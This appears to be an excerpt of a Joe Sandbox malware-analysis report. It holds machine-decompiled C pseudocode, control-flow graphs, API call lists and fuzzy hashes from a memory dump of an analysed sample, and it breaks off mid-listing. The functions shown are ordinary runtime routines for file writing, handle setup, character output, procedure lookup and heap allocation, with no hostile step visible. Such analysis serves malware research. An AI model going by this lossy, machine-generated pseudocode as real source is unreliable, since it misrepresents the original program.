                                                0x001baa15
                                                0x001baa1a
                                                0x001baa1f
                                                0x001babf9
                                                0x001babf9
                                                0x00000000
                                                0x001babf9
                                                0x001baa27
                                                0x001baa5a
                                                0x001baa5d
                                                0x001baa60
                                                0x001baa63
                                                0x001baa6a
                                                0x001baa6d
                                                0x001baa70
                                                0x001baa74
                                                0x001baa77
                                                0x001baa79
                                                0x001baa7f
                                                0x001baa81
                                                0x001baa83
                                                0x001baa85
                                                0x00000000
                                                0x00000000
                                                0x001baa87
                                                0x001baa8a
                                                0x001baa8c
                                                0x001baa91
                                                0x001baa99
                                                0x001baa9e
                                                0x001baa9e
                                                0x001baaa3
                                                0x001baaaa
                                                0x001baaac
                                                0x001baaf1
                                                0x001baaf8
                                                0x001baafb
                                                0x001bab00
                                                0x001bab5a
                                                0x001bab5c
                                                0x001bab5d
                                                0x001bab69
                                                0x001bab6f
                                                0x001bab71
                                                0x001bab79
                                                0x001bab79
                                                0x00000000
                                                0x001bab7c
                                                0x001bab06
                                                0x001bab06
                                                0x001bab08
                                                0x001bab4a
                                                0x001bab28
                                                0x00000000
                                                0x001bab28
                                                0x001bab0a
                                                0x001bab0a
                                                0x001bab0d
                                                0x001bab38
                                                0x00000000
                                                0x001bab38
                                                0x001bab0f
                                                0x001bab12
                                                0x00000000
                                                0x00000000
                                                0x001bab23
                                                0x00000000
                                                0x001baaae
                                                0x001baaae
                                                0x001baab1
                                                0x001baab3
                                                0x001baae4
                                                0x001baad1
                                                0x001bab7f
                                                0x001bab82
                                                0x001bab83
                                                0x001bab84
                                                0x001bab85
                                                0x001bab88
                                                0x001bab8a
                                                0x00000000
                                                0x001babf4
                                                0x001bab8c
                                                0x001bab8f
                                                0x001bab91
                                                0x001babbf
                                                0x001babbf
                                                0x001babc1
                                                0x001babc4
                                                0x001babc7
                                                0x001babce
                                                0x001babd3
                                                0x001babdd
                                                0x001babdd
                                                0x001babe1
                                                0x001babe8
                                                0x001babec
                                                0x001baa4b
                                                0x00000000
                                                0x001baa4b
                                                0x001babd5
                                                0x001babd8
                                                0x001babdb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001babdb
                                                0x001bab95
                                                0x001bab96
                                                0x001bab98
                                                0x001babb3
                                                0x001bab9a
                                                0x001bab9a
                                                0x001bab9e
                                                0x001baba5
                                                0x001baba9
                                                0x001baba9
                                                0x00000000
                                                0x001bab98
                                                0x001baab7
                                                0x001baab9
                                                0x00000000
                                                0x00000000
                                                0x001baac9
                                                0x00000000
                                                0x001baace
                                                0x001baaac
                                                0x001baa7b
                                                0x001baa7d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001baa7d
                                                0x001baa29
                                                0x001baa2b
                                                0x001baa33
                                                0x001baa37
                                                0x001baa3c
                                                0x001baa43
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 001BA14A: GetConsoleOutputCP.KERNEL32(8121A627,00000000,00000000,00000000), ref: 001BA1AD
                                                • WriteFile.KERNEL32(?,00000000,?,001D4340,00000000,0000000C,00000000,00000000,?,00000000,001D4340,00000010,001B1703,00000000,00000000,00000000), ref: 001BAB69
                                                • GetLastError.KERNEL32(?,00000000), ref: 001BAB73
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                • String ID:
                                                • API String ID: 2915228174-0
                                                • Opcode ID: 36d0058b0e7e520903bd6f7a6669871bd6f7f7be4fac7852de5cb89ce16cb572
                                                • Instruction ID: 1160ac9ad0e0b6746cfb6b0fceae1d033f4674bfcb872c78a7bdd0830505ae49
                                                • Opcode Fuzzy Hash: 36d0058b0e7e520903bd6f7a6669871bd6f7f7be4fac7852de5cb89ce16cb572
                                                • Instruction Fuzzy Hash: EC61E1B1D04249AFDF15CFB8C984EEEBFB9AF19304F444089E854A7242D332D945CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 225 1ba602-1ba657 call 1aa310 228 1ba659 225->228 229 1ba6cc-1ba6dc call 1a9545 225->229 231 1ba65f 228->231 233 1ba665-1ba667 231->233 234 1ba669-1ba66e 233->234 235 1ba681-1ba6a6 WriteFile 233->235 236 1ba670-1ba676 234->236 237 1ba677-1ba67f 234->237 238 1ba6a8-1ba6b3 235->238 239 1ba6c4-1ba6ca GetLastError 235->239 236->237 237->233 237->235 238->229 240 1ba6b5-1ba6c0 238->240 239->229 240->231 241 1ba6c2 240->241 241->229
                                                C-Code - Quality: 81%
                                                			E001BA602(void* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				char _v9;
                                                				void _v5128;
                                                				long _v5132;
                                                				intOrPtr _v5136;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				int _t41;
                                                				long _t43;
                                                				char _t44;
                                                				void* _t46;
                                                				intOrPtr* _t50;
                                                				intOrPtr _t54;
                                                				void* _t55;
                                                				long _t56;
                                                				char* _t57;
                                                				signed int _t58;
                                                
                                                				E001AA310(0x140c);
                                                				_t29 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t29 ^ _t58;
                                                				_t47 = _a8;
                                                				_t46 = _a4;
                                                				_t55 = _t46;
                                                				_t50 = _a12;
                                                				_t54 = _a16 + _t50;
                                                				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0x203178 + (_a8 >> 6) * 4)) + 0x18 + (_t47 & 0x0000003f) * 0x38));
                                                				asm("stosd");
                                                				_v5136 = _t54;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				if(_t50 < _t54) {
                                                					_t55 = _v5132;
                                                					do {
                                                						_t57 =  &_v5128;
                                                						while(_t50 < _t54) {
                                                							_t44 =  *_t50;
                                                							_t50 = _t50 + 1;
                                                							if(_t44 == 0xa) {
                                                								 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 1;
                                                								 *_t57 = 0xd;
                                                								_t57 = _t57 + 1;
                                                							}
                                                							 *_t57 = _t44;
                                                							_t57 = _t57 + 1;
                                                							if(_t57 <  &_v9) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						_a12 = _t50;
                                                						_t56 = _t57 -  &_v5128;
                                                						_t41 = WriteFile(_t55,  &_v5128, _t56,  &_v5132, 0); // executed
                                                						if(_t41 == 0) {
                                                							 *_t46 = GetLastError();
                                                						} else {
                                                							_t43 = _v5132;
                                                							 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t43;
                                                							if(_t43 >= _t56) {
                                                								goto L9;
                                                							}
                                                						}
                                                						goto L12;
                                                						L9:
                                                						_t50 = _a12;
                                                						_t54 = _v5136;
                                                					} while (_t50 < _t54);
                                                				}
                                                				L12:
                                                				return E001A9545(_t46, _t46, _v8 ^ _t58, _t54, _t55, _t56);
                                                			}






















                                                0x001ba60c
                                                0x001ba611
                                                0x001ba618
                                                0x001ba61b
                                                0x001ba62d
                                                0x001ba639
                                                0x001ba63f
                                                0x001ba642
                                                0x001ba644
                                                0x001ba64c
                                                0x001ba64d
                                                0x001ba653
                                                0x001ba654
                                                0x001ba657
                                                0x001ba659
                                                0x001ba65f
                                                0x001ba65f
                                                0x001ba665
                                                0x001ba669
                                                0x001ba66b
                                                0x001ba66e
                                                0x001ba670
                                                0x001ba673
                                                0x001ba676
                                                0x001ba676
                                                0x001ba677
                                                0x001ba679
                                                0x001ba67f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ba67f
                                                0x001ba687
                                                0x001ba68a
                                                0x001ba69e
                                                0x001ba6a6
                                                0x001ba6ca
                                                0x001ba6a8
                                                0x001ba6a8
                                                0x001ba6ae
                                                0x001ba6b3
                                                0x00000000
                                                0x00000000
                                                0x001ba6b3
                                                0x00000000
                                                0x001ba6b5
                                                0x001ba6b5
                                                0x001ba6b8
                                                0x001ba6be
                                                0x001ba6c2
                                                0x001ba6cc
                                                0x001ba6dc

                                                APIs
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,001BAB4F,00000000,00000000,00000000,?,0000000C,00000000), ref: 001BA69E
                                                • GetLastError.KERNEL32(?,001BAB4F,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,001D4340,00000010,001B1703,00000000,00000000), ref: 001BA6C4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID:
                                                • API String ID: 442123175-0
                                                • Opcode ID: 76bac10e09d5ffaf1a5a79bc367273fa1cca3c4f52f6402311ffbd7d0d3a7607
                                                • Instruction ID: 88bdd40ffc8633881b39c51a87829870537ac5677b73e2add855fa30599f4786
                                                • Opcode Fuzzy Hash: 76bac10e09d5ffaf1a5a79bc367273fa1cca3c4f52f6402311ffbd7d0d3a7607
                                                • Instruction Fuzzy Hash: B22191B4A002199FCF19CF29DC909E9B7B9EF59301F5844AAE906D7251E730DE82CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 242 1b7bcb-1b7bd0 243 1b7bd2-1b7bea 242->243 244 1b7bf8-1b7c01 243->244 245 1b7bec-1b7bf0 243->245 247 1b7c13 244->247 248 1b7c03-1b7c06 244->248 245->244 246 1b7bf2-1b7bf6 245->246 249 1b7c6d-1b7c71 246->249 252 1b7c15-1b7c22 GetStdHandle 247->252 250 1b7c08-1b7c0d 248->250 251 1b7c0f-1b7c11 248->251 249->243 253 1b7c77-1b7c7a 249->253 250->252 251->252 254 1b7c4f-1b7c61 252->254 255 1b7c24-1b7c26 252->255 254->249 256 1b7c63-1b7c66 254->256 255->254 257 1b7c28-1b7c31 GetFileType 255->257 256->249 257->254 258 1b7c33-1b7c3c 257->258 259 1b7c3e-1b7c42 258->259 260 1b7c44-1b7c47 258->260 259->249 260->249 261 1b7c49-1b7c4d 260->261 261->249
                                                C-Code - Quality: 86%
                                                			E001B7BCB() {
                                                				signed int _t20;
                                                				signed int _t22;
                                                				long _t23;
                                                				signed char _t25;
                                                				void* _t28;
                                                				signed int _t31;
                                                				void* _t33;
                                                
                                                				_t31 = 0;
                                                				do {
                                                					_t20 = _t31 & 0x0000003f;
                                                					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x203178 + (_t31 >> 6) * 4));
                                                					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
                                                						 *(_t33 + 0x28) = 0x81;
                                                						_t22 = _t31;
                                                						if(_t22 == 0) {
                                                							_push(0xfffffff6);
                                                						} else {
                                                							if(_t22 == 1) {
                                                								_push(0xfffffff5);
                                                							} else {
                                                								_push(0xfffffff4);
                                                							}
                                                						}
                                                						_pop(_t23);
                                                						_t28 = GetStdHandle(_t23);
                                                						if(_t28 == 0xffffffff || _t28 == 0) {
                                                							L16:
                                                							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                							 *(_t33 + 0x18) = 0xfffffffe;
                                                							_t20 =  *0x202fe8; // 0x0
                                                							if(_t20 != 0) {
                                                								_t20 =  *(_t20 + _t31 * 4);
                                                								 *(_t20 + 0x10) = 0xfffffffe;
                                                							}
                                                							goto L18;
                                                						} else {
                                                							_t25 = GetFileType(_t28); // executed
                                                							if(_t25 == 0) {
                                                								goto L16;
                                                							} else {
                                                								_t20 = _t25 & 0x000000ff;
                                                								 *(_t33 + 0x18) = _t28;
                                                								if(_t20 != 2) {
                                                									if(_t20 == 3) {
                                                										 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
                                                									}
                                                								} else {
                                                									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                								}
                                                								goto L18;
                                                							}
                                                						}
                                                					} else {
                                                						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
                                                					}
                                                					L18:
                                                					_t31 = _t31 + 1;
                                                				} while (_t31 != 3);
                                                				return _t20;
                                                			}










                                                0x001b7bd0
                                                0x001b7bd2
                                                0x001b7bd6
                                                0x001b7bdf
                                                0x001b7bea
                                                0x001b7bfa
                                                0x001b7bfe
                                                0x001b7c01
                                                0x001b7c13
                                                0x001b7c03
                                                0x001b7c06
                                                0x001b7c0f
                                                0x001b7c08
                                                0x001b7c0b
                                                0x001b7c0b
                                                0x001b7c06
                                                0x001b7c15
                                                0x001b7c1d
                                                0x001b7c22
                                                0x001b7c4f
                                                0x001b7c4f
                                                0x001b7c53
                                                0x001b7c5a
                                                0x001b7c61
                                                0x001b7c63
                                                0x001b7c66
                                                0x001b7c66
                                                0x00000000
                                                0x001b7c28
                                                0x001b7c29
                                                0x001b7c31
                                                0x00000000
                                                0x001b7c33
                                                0x001b7c33
                                                0x001b7c36
                                                0x001b7c3c
                                                0x001b7c47
                                                0x001b7c49
                                                0x001b7c49
                                                0x001b7c3e
                                                0x001b7c3e
                                                0x001b7c3e
                                                0x00000000
                                                0x001b7c3c
                                                0x001b7c31
                                                0x001b7bf2
                                                0x001b7bf2
                                                0x001b7bf2
                                                0x001b7c6d
                                                0x001b7c6d
                                                0x001b7c6e
                                                0x001b7c7a

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 001B7C17
                                                • GetFileType.KERNELBASE(00000000), ref: 001B7C29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: FileHandleType
                                                • String ID:
                                                • API String ID: 3000768030-0
                                                • Opcode ID: 97656e9d3eeecc9cdc7336e17d729f725ef7ebb700a89f5daee4ce1a7a75fd69
                                                • Instruction ID: 762815015c1226ac21ac5f48bb44b1325c6d1c580b27e0a6c4280390a76f0c0c
                                                • Opcode Fuzzy Hash: 97656e9d3eeecc9cdc7336e17d729f725ef7ebb700a89f5daee4ce1a7a75fd69
                                                • Instruction Fuzzy Hash: 3111667150C7534ACB344E3E9DCC5A27E95A7D6334B39071EE0B6876F2C334D986A641
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 262 1a71dc-1a71fb 263 1a71fd-1a71ff 262->263 264 1a7201-1a7209 262->264 265 1a725d-1a726a call 1a9545 263->265 266 1a720b-1a7215 264->266 267 1a722e-1a7232 264->267 266->267 269 1a7217-1a7229 266->269 270 1a7257 267->270 271 1a7234-1a7243 call 1a6e56 267->271 273 1a72e4-1a72e7 269->273 275 1a725c 270->275 277 1a726d-1a72a2 271->277 278 1a7245-1a7248 271->278 273->275 275->265 284 1a72b7-1a72bf 277->284 285 1a72a4-1a72a7 277->285 279 1a7249 call 1a66be 278->279 282 1a724e-1a7255 279->282 282->270 282->275 287 1a72c1-1a72d2 call 1b178c 284->287 288 1a72d4-1a72de 284->288 285->284 286 1a72a9-1a72ad 285->286 286->270 289 1a72af-1a72b5 286->289 287->270 287->288 288->270 288->273 289->279
                                                C-Code - Quality: 43%
                                                			E001A71DC(void* __ecx, signed int* __edx, void* __esi, signed short _a4) {
                                                				signed int _v8;
                                                				char _v40;
                                                				char _v42;
                                                				signed short _v44;
                                                				intOrPtr* _v48;
                                                				char _v52;
                                                				char _v56;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed int _t33;
                                                				signed int _t37;
                                                				intOrPtr* _t40;
                                                				void* _t51;
                                                				void* _t55;
                                                				void* _t58;
                                                				signed short _t60;
                                                				signed int _t62;
                                                				signed int* _t72;
                                                				void* _t73;
                                                				void* _t77;
                                                				signed int _t78;
                                                				signed int _t79;
                                                				signed int _t80;
                                                
                                                				_t74 = __esi;
                                                				_t72 = __edx;
                                                				_t33 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t33 ^ _t80;
                                                				_t60 = _a4;
                                                				_t73 = __ecx;
                                                				if(0xffff != _t60) {
                                                					_push(__esi);
                                                					_t62 =  *( *(__ecx + 0x20));
                                                					if(_t62 == 0) {
                                                						L5:
                                                						if( *((intOrPtr*)(_t73 + 0x4c)) == 0) {
                                                							L9:
                                                							_t37 = 0xffff;
                                                						} else {
                                                							E001A6E56(_t73);
                                                							_t40 =  *((intOrPtr*)(_t73 + 0x38));
                                                							_v48 = _t40;
                                                							if(_t40 != 0) {
                                                								_v44 = _t60;
                                                								 *0x1c7144(_t73 + 0x40,  &_v44,  &_v42,  &_v56,  &_v40,  &_v8,  &_v52);
                                                								_t51 =  *((intOrPtr*)( *((intOrPtr*)( *_t40 + 0x1c))))();
                                                								if(_t51 == 0) {
                                                									L16:
                                                									_t77 = _v52 -  &_v40;
                                                									if(_t77 == 0 || _t77 == E001B178C(_t60, _t72,  &_v40, 1, _t77,  *((intOrPtr*)(_t73 + 0x4c)))) {
                                                										 *((char*)(_t73 + 0x3e)) = 1;
                                                										if(_v56 ==  &_v44) {
                                                											goto L9;
                                                										} else {
                                                											goto L19;
                                                										}
                                                									} else {
                                                										goto L9;
                                                									}
                                                								} else {
                                                									_t55 = _t51 - 1;
                                                									if(_t55 == 0) {
                                                										goto L16;
                                                									} else {
                                                										if(_t55 != 0) {
                                                											goto L9;
                                                										} else {
                                                											_push( *((intOrPtr*)(_t73 + 0x4c)));
                                                											_push(_v44);
                                                											goto L8;
                                                										}
                                                									}
                                                								}
                                                								L20:
                                                							} else {
                                                								_push( *((intOrPtr*)(_t73 + 0x4c)));
                                                								_push(_t60); // executed
                                                								L8:
                                                								_t58 = E001A66BE(); // executed
                                                								_t37 = _t60 & 0x0000ffff;
                                                								if(_t58 == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t72 =  *(__ecx + 0x30);
                                                						_t78 =  *_t72;
                                                						if(_t62 >= _t62 + _t78 * 2) {
                                                							goto L5;
                                                						} else {
                                                							 *_t72 = _t78 - 1;
                                                							_t72 =  *(__ecx + 0x20);
                                                							_t79 =  *_t72;
                                                							 *_t72 = _t79 + 2;
                                                							 *_t79 = _t60;
                                                							L19:
                                                							_t37 = _t60;
                                                						}
                                                					}
                                                					_pop(_t74);
                                                				} else {
                                                					_t37 = 0;
                                                				}
                                                				return E001A9545(_t37, _t60, _v8 ^ _t80, _t72, _t73, _t74);
                                                				goto L20;
                                                			}


























                                                0x001a71dc
                                                0x001a71dc
                                                0x001a71e2
                                                0x001a71e9
                                                0x001a71ed
                                                0x001a71f6
                                                0x001a71fb
                                                0x001a7204
                                                0x001a7205
                                                0x001a7209
                                                0x001a722e
                                                0x001a7232
                                                0x001a7257
                                                0x001a7257
                                                0x001a7234
                                                0x001a7236
                                                0x001a723b
                                                0x001a723e
                                                0x001a7243
                                                0x001a726d
                                                0x001a7294
                                                0x001a729f
                                                0x001a72a2
                                                0x001a72b7
                                                0x001a72bd
                                                0x001a72bf
                                                0x001a72d7
                                                0x001a72de
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001a72a4
                                                0x001a72a4
                                                0x001a72a7
                                                0x00000000
                                                0x001a72a9
                                                0x001a72ad
                                                0x00000000
                                                0x001a72af
                                                0x001a72af
                                                0x001a72b2
                                                0x00000000
                                                0x001a72b2
                                                0x001a72ad
                                                0x001a72a7
                                                0x00000000
                                                0x001a7245
                                                0x001a7245
                                                0x001a7248
                                                0x001a7249
                                                0x001a7249
                                                0x001a7251
                                                0x001a7255
                                                0x00000000
                                                0x00000000
                                                0x001a7255
                                                0x001a7243
                                                0x001a720b
                                                0x001a720b
                                                0x001a720e
                                                0x001a7215
                                                0x00000000
                                                0x001a7217
                                                0x001a721a
                                                0x001a721c
                                                0x001a721f
                                                0x001a7224
                                                0x001a7226
                                                0x001a72e4
                                                0x001a72e4
                                                0x001a72e4
                                                0x001a7215
                                                0x001a725c
                                                0x001a71fd
                                                0x001a71fd
                                                0x001a71fd
                                                0x001a726a
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: Fputc
                                                • String ID:
                                                • API String ID: 3078413507-0
                                                • Opcode ID: dad563327f2d9e13bc839b86e3eba821785d4d44cbf66bc300837e05c8bc1efd
                                                • Instruction ID: 94b4203876f0d2511ea21fb2286b58feb21d0885e1da4ca80f2c139d9bb0e5c8
                                                • Opcode Fuzzy Hash: dad563327f2d9e13bc839b86e3eba821785d4d44cbf66bc300837e05c8bc1efd
                                                • Instruction Fuzzy Hash: ED31623990410AEBCF14DFA4C954AEDB7B9BF4A314B140167F542E7780EB35EA44DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 292 1b899c-1b89c4 293 1b89ca-1b89cc 292->293 294 1b89c6-1b89c8 292->294 296 1b89ce-1b89d0 293->296 297 1b89d2-1b89d9 call 1b88d1 293->297 295 1b8a1b-1b8a1e 294->295 296->295 299 1b89de-1b89e2 297->299 300 1b8a01-1b8a18 299->300 301 1b89e4-1b89f2 GetProcAddress 299->301 303 1b8a1a 300->303 301->300 302 1b89f4-1b89ff call 1b3546 301->302 302->303 303->295
                                                C-Code - Quality: 85%
                                                			E001B899C(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				struct HINSTANCE__* _t11;
                                                				_Unknown_base(*)()* _t14;
                                                				signed int* _t20;
                                                				signed int _t22;
                                                				signed int _t28;
                                                				signed int _t29;
                                                				signed int _t30;
                                                				signed int _t31;
                                                				_Unknown_base(*)()* _t36;
                                                
                                                				_t20 = 0x2033d0 + _a4 * 4;
                                                				_t28 =  *0x1d5010; // 0x8121a627
                                                				_t31 = _t30 | 0xffffffff;
                                                				_t29 = _t28 ^  *_t20;
                                                				_t22 = _t28 & 0x0000001f;
                                                				asm("ror edx, cl");
                                                				if(_t29 != _t31) {
                                                					if(_t29 == 0) {
                                                						_t11 = E001B88D1(_t22, _a12, _a16); // executed
                                                						if(_t11 == 0) {
                                                							L7:
                                                							_push(0x20);
                                                							asm("ror edi, cl");
                                                							 *_t20 = _t31 ^  *0x1d5010;
                                                							_t14 = 0;
                                                							L8:
                                                							return _t14;
                                                						}
                                                						_t36 = GetProcAddress(_t11, _a8);
                                                						if(_t36 == 0) {
                                                							goto L7;
                                                						}
                                                						 *_t20 = E001B3546(_t36);
                                                						_t14 = _t36;
                                                						goto L8;
                                                					}
                                                					return _t29;
                                                				}
                                                				return 0;
                                                			}












                                                0x001b89a6
                                                0x001b89b0
                                                0x001b89b6
                                                0x001b89bb
                                                0x001b89bd
                                                0x001b89c0
                                                0x001b89c4
                                                0x001b89cc
                                                0x001b89d9
                                                0x001b89e2
                                                0x001b8a01
                                                0x001b8a06
                                                0x001b8a0e
                                                0x001b8a16
                                                0x001b8a18
                                                0x001b8a1a
                                                0x00000000
                                                0x001b8a1a
                                                0x001b89ee
                                                0x001b89f2
                                                0x00000000
                                                0x00000000
                                                0x001b89fb
                                                0x001b89fd
                                                0x00000000
                                                0x001b89fd
                                                0x00000000
                                                0x001b89ce
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 531cbe5d08be5c38a95462690c2b20be89531ad19465dd4aa4fc5271899c0ec3
                                                • Instruction ID: 68dc45f754b0e7ea95dbf49032ba84f9c58c469676fba632c9bd4a538ae481a2
                                                • Opcode Fuzzy Hash: 531cbe5d08be5c38a95462690c2b20be89531ad19465dd4aa4fc5271899c0ec3
                                                • Instruction Fuzzy Hash: BB01D2373112119BDF2ADE6AEC80AAA379AAB85B607158122F910DB184DF319841D781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 306 1b6392-1b639d 307 1b63ab-1b63b1 306->307 308 1b639f-1b63a9 306->308 310 1b63ca-1b63db RtlAllocateHeap 307->310 311 1b63b3-1b63b4 307->311 308->307 309 1b63df-1b63ea call 1aff41 308->309 315 1b63ec-1b63ee 309->315 312 1b63dd 310->312 313 1b63b6-1b63bd call 1b56e4 310->313 311->310 312->315 313->309 319 1b63bf-1b63c8 call 1b3362 313->319 319->309 319->310
                                                C-Code - Quality: 100%
                                                			E001B6392(signed int _a4, signed int _a8) {
                                                				void* _t8;
                                                				void* _t12;
                                                				signed int _t13;
                                                				signed int _t18;
                                                				long _t19;
                                                
                                                				_t18 = _a4;
                                                				if(_t18 == 0) {
                                                					L2:
                                                					_t19 = _t18 * _a8;
                                                					if(_t19 == 0) {
                                                						_t19 = _t19 + 1;
                                                					}
                                                					while(1) {
                                                						_t8 = RtlAllocateHeap( *0x203554, 8, _t19); // executed
                                                						if(_t8 != 0) {
                                                							break;
                                                						}
                                                						__eflags = E001B56E4();
                                                						if(__eflags == 0) {
                                                							L8:
                                                							 *((intOrPtr*)(E001AFF41())) = 0xc;
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						_t12 = E001B3362(__eflags, _t19);
                                                						__eflags = _t12;
                                                						if(_t12 == 0) {
                                                							goto L8;
                                                						}
                                                					}
                                                					return _t8;
                                                				}
                                                				_t13 = 0xffffffe0;
                                                				if(_t13 / _t18 < _a8) {
                                                					goto L8;
                                                				}
                                                				goto L2;
                                                			}








                                                0x001b6398
                                                0x001b639d
                                                0x001b63ab
                                                0x001b63ab
                                                0x001b63b1
                                                0x001b63b3
                                                0x001b63b3
                                                0x001b63ca
                                                0x001b63d3
                                                0x001b63db
                                                0x00000000
                                                0x00000000
                                                0x001b63bb
                                                0x001b63bd
                                                0x001b63df
                                                0x001b63e4
                                                0x001b63ea
                                                0x00000000
                                                0x001b63ea
                                                0x001b63c0
                                                0x001b63c6
                                                0x001b63c8
                                                0x00000000
                                                0x00000000
                                                0x001b63c8
                                                0x00000000
                                                0x001b63ca
                                                0x001b63a3
                                                0x001b63a9
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001B7A6F,00000001,00000364,00000005,000000FF,?,00000000,?,001AEC65,00000000,?), ref: 001B63D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
